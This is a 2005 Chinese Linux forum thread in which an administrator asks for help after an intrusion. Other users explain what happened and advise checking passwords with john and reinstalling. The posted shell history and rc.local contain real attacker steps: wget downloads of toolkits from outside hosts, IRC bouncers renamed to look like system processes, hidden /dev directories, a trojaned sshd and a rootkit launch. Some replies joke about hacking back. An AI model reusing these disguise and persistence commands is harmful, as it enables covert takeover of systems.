论坛徽章:: 0

电梯直达

1楼 [收藏(0)] [报告]

发表于 2005-10-08 12:05 |只看该作者 |倒序浏览

系统是redHat 9，自己编译的内核 2.4.27 ，装了apche、mysql、php、proftp、qmail。

今天早上登录系统，查看系统日志，发现/var/log/ 下面被删了个干净，
再查看history 发现下面的内容
  2  cd /dev/.man
3  cd /dev/ida/.man
4  wget www.warrlop.0catch.com/a.tgz
5  wget 209.63.57.10/a.tgz
6  ftp
7  ps x
8  wget www.rossi25.go.ro/xx.tgz
9  tar xzvf xx.tgz
  10  rm -rf xx.tgz
  11  cd .sh
  12  ls
  13  ./x 65.35
  14  ./x 216.48
  15  ./x 216.49
  16  exit
  17  cd /var/tmp'ls -a
  18  cd /var/tmp;ls -a
  19  cd /var/dev
  20  cd /dev
  21  mkdir "."
  22  mkdir " "
  23  cd " "
  24  wget iceghost.go.ro/b.tar.gz
  25  RM -RF no_user.phtml
  26  rm -rf no_user.phtml
  27  wget geocities.com/kiaxk/b.tar.gz
  28  wget http://www.psychoid.net/psyBNC2.3.1.tar.gz
  29  tar zxvf psyBNC2.3.1.tar.gz
  30  rm -rf psyBNC2.3.1.tar.gz
  31  mv psybnc html
  32  cd html
  33  ls -a
  34  ps -ax
  35  mv psybnc [httpd <defunct>;]
  36 mv psybnc "[httpd <defunct>;]"
  37  mv psybnc "qmail-clean"
  38  ls -a
  39  make
  40  ps -ax
  41  mv psybnc "/var/qmail/bin/qmail-queue"
  42  mv psybnc "qmail-clean"
  43  PATH

ATH
44 PATH=

ATH
  45  "qmail-clean"
  46  uname -a
  47  id

文库|博客

dingzhener

白手起家

论坛徽章:: 0

2楼 [报告]

发表于 2005-10-08 14:22 |只看该作者

系统被入侵，帮帮忙阿！！！非常急！！！关键字：psybnc

发现rc.local被修改，如下：

killall -9 sshd 2>;/dev/null
/bin/.../sshd/sbin/sshd1 2>;/dev/null
/bin/.../hate/sk >; hide 2>;/dev/null
/bin/.../hate/sk i `/sbin/pidof /bin/.../sshd/sbin/sshd1` >;>; hide 2>;/dev/null
rm -rf hide 2>;/dev/null
rm -rf /var/lock/subsys/sshd 2>;/dev/null
/bin/up2date 2>; /dev/null
echo 1 >; /proc/sys/net/ipv4/tcp_syncookies
echo 1 >; /proc/sys/net/ipv4/icmp_echo_ignore_all

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

dajun

小富即安

论坛徽章:: 0

3楼 [报告]

发表于 2005-10-08 14:44 |只看该作者

系统被入侵，帮帮忙阿！！！非常急！！！关键字：psybnc

你完蛋了，重装吧
重装之前最好把他的东西都找出来（借我用用：））

下次用强一点的密码

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

dingzhener

白手起家

论坛徽章:: 0

4楼 [报告]

发表于 2005-10-08 14:49 |只看该作者

系统被入侵，帮帮忙阿！！！非常急！！！关键字：psybnc

什么阿？要重装也要搞明白，人家怎么把自己的系统弄乱的阿，这个入侵的人装的是什么软件阿？还有那些修改rc.local，是做什么用的？

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

dajun

小富即安

论坛徽章:: 0

5楼 [报告]

发表于 2005-10-08 14:59 |只看该作者

系统被入侵，帮帮忙阿！！！非常急！！！关键字：psybnc

那个家伙好象是暴力破解了你的口令（也许，好象，大概）
然后又拿到了root权限，或是直接破解了root的密码
然后有用你的机器去破解别人的机器

rc.local里是拿他的sshd替换你的sshd，这样他就可以
自由登陆你的机器，也许还可以记录你的口令
似乎还装了 rootkit ，（不确定） /bin/.../hate/sk

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

dingzhener

白手起家

论坛徽章:: 0

6楼 [报告]

发表于 2005-10-08 15:11 |只看该作者

系统被入侵，帮帮忙阿！！！非常急！！！关键字：psybnc

噢，先谢谢你，我再查查资料，先搞明白，重装系统看来是必要的了。

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

第二场雪

丰衣足食

论坛徽章:: 0

7楼 [报告]

发表于 2005-10-08 23:19 |只看该作者

系统被入侵，帮帮忙阿！！！非常急！！！关键字：psybnc

到现在还一个Linux肉鸡没有

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

fwizard

小富即安

论坛徽章:: 0

8楼 [报告]

发表于 2005-10-09 08:53 |只看该作者

系统被入侵，帮帮忙阿！！！非常急！！！关键字：psybnc

原帖由 "dajun" 发表：
重装之前最好把他的东西都找出来（借我用用：））

根据history里内容去找啊,有能力的话把那片的机器搞定了,估计资料还挺多的呢

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

fwizard

小富即安

论坛徽章:: 0

9楼 [报告]

发表于 2005-10-09 08:58 |只看该作者

系统被入侵，帮帮忙阿！！！非常急！！！关键字：psybnc

楼主把你的shadow用john跑一下,看有没有弱口令,有的话估计是弱口令出了问题.如果不是的估计问题出在你的服务上了,最有可能的就是apache和mysql了,如果是这两个的话注意打补丁和防止注入.入侵者主要的动作是提升权限和留后门吧,把后门相关的东西清一下,然后把ssh重装一下,应该问题不大.关键是找出入侵原因,不然即使是重装了别人还能进来的